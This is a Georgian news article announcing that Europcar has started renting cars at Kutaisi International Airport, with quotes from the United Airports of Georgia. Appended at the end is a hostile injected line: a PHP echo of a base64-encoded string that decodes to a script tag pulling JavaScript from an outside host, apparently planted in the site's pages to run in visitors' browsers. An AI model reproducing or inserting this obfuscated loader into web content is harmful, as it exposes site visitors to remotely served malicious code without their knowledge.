celsiusi
ავერსი საქკაბელი

 ქუთაისის დავით აღმაშენებლის სახელობის საერთაშორისო აეროპორტში ოპერირება საერთაშორისო ბრენდმა Europcar-მა დაიწყო.

ამის შესახებ ინფორმაციას საქართველოს აეროპორტების გაერთიანება ავრცელებს.

მათივე ცნობით, ფრანგული Europcar-ი ქუთაისის აეროპორტისთვის მესამე საერთაშორისო კომპანიაა, რომელიც მგზავრებს მანქანის გაქირავების სერვისს სთავაზობს.

„კომპანია ქუთაისის საერთაშორისო აეროპორტში კიდევ ერთი საერთაშორისო ბრენდით, Goldcar-ითაც არის წარმოდგენილი, რომელიც მომხმარებლებს უახლესი, როგორც პრემიუმ კლასის ავტომობილების, ისე ბიუჯეტური ტიპის ავტომობილების გაქირავებას სთავაზობს.

სერვისით სარგებლობა მგზავრებს ჩამოფრენის დარბაზში შეუძლიათ, სადაც Europcar-ი ოფისია განთავსებული. ავტოპარკი დაკომპლექტებულია უახლესი, სედანის ტიპის, ასევე მაღალი გამავლობის სხვადასხვა ბრენდისა და მოდელის ავტომობილით. ავტომობილების დაჯავშნა აეროპორტის მგზავრებს როგორც ადგილზე, ისე კომპანიის ვებგვერდზეც შეუძლიათ https://www.europcar.ge/ka/fleetguide “, - აღნიშნულია ინფორმაციაში.

საქართველოს აეროპორტების გაერთიანების გენერალური დირექტორის, ირაკლი ქარქაშაძის განცხადებით, კიდევ ერთი საერთაშორისო ბრენდის შემოსვლა ხაზს უსვამს, რომ ქუთაისის აეროპორტის მიმართ ბიზნესის მხრიდან ინტერესი მაღალია.

„ქუთაისის საერთაშორისო აეროპორტში დღეიდან, მგზავრებს შეუძლიათ ისარგებლონ მანქანის გაქირავების მესამე საერთაშორისო ბრენდის, Europcar-ის წარმომადგენლობით. შესაბამისად, მგზავრებს უკვე საშუალება აქვთ მათთვის სასურველი ავტომობილი აეროპორტშივე იქირაონ და მიიღონ ის სერვისი, რომელი მანქანების გაქირავებასთან არის დაკავშირებული. წარმატებებს ვუსურვებთ ახალ კომპანიას ქუთაისის აეროპორტში და რა თქმა უნდა, ყოველთვის მივესალმებით და ხელს შევუწყობთ ახალი სერვისების შეთავაზებას ჩვენი მგზავრებისთვის”, - განაცხადა ირაკლი ქარქაშაძემ.

საქართველოს აეროპორტების გაერთიანების ინფორმაციით, Europcar Georgia, 1949 წელს საფრანგეთში დაარსებული Europcar Internationally-ის ექსკლუზიური წარმომადგენელია საქართველოში, რომელიც მომხმარებელს 3 ტიპის სერვისს სთავაზობს: დღიური გაქირავება, საოპერაციო ლიზინგი და სატრანსპორტო მომსახურება.

147
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");